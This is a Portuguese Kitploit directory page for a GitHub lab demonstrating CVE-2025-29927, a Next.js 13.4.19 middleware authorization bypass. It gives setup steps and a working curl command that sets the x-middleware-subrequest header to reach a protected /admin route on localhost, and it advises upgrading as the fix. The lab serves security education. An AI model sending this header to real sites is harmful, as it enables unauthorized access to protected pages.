Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
NextJS_CVE-2025-29927 — Demonstra o bypass do cabeçalho x-middleware-subrequest no Next.js 13.4.19, permitindo acesso não autorizado a rotas protegidas. Inclui configuração, fluxo normal e etapas de exploração baseadas em curl. | Kitploit
Ferramentas/GitHubGitHub/all3njk/nextjs_cve-2025-29927
Análise de VulnerabilidadesExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática
GitHuball3njk/nextjs_cve-2025-29927

NextJS_CVE-2025-29927

Demonstra o bypass do cabeçalho x-middleware-subrequest no Next.js 13.4.19, permitindo acesso não autorizado a rotas protegidas. Inclui configuração, fluxo normal e etapas de exploração baseadas em curl.

Ver Repositório
6há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Demonstração de Bypass de Autorização Next.js

Esta aplicação demonstra a vulnerabilidade x-middleware-subrequest no Next.js 13.4.19, que permite contornar a proteção do middleware.

Configuração

  1. Instale as dependências:
root@kitploit:~
npm install
  1. Inicie o servidor de desenvolvimento:
root@kitploit:~
npm run dev

Demonstração da Vulnerabilidade

A aplicação tem uma página de administração em /admin que deveria ser protegida pelo middleware. No entanto, ela pode ser acessada sem autenticação usando o cabeçalho x-middleware-subrequest.

Fluxo Normal

  1. Visite /admin - Você será redirecionado para /login
  • Faça login com qualquer credencial - Você será redirecionado para /admin
  • Método de Bypass

    Para contornar a autenticação, você pode usar curl ou qualquer cliente HTTP para fazer uma requisição com o cabeçalho x-middleware-subrequest:

    root@kitploit:~
    curl -H "x-middleware-subrequest: middleware" http://localhost:3000/admin
    

    Implicações de Segurança

    Esta vulnerabilidade demonstra como a proteção do middleware pode ser contornada no Next.js 13.4.19 usando o cabeçalho x-middleware-subrequest. Em um ambiente de produção, isso poderia permitir acesso não autorizado a rotas protegidas.

    Correção

    Para corrigir esta vulnerabilidade, atualize para uma versão mais recente do Next.js onde este problema foi corrigido.

    Baixar ferramenta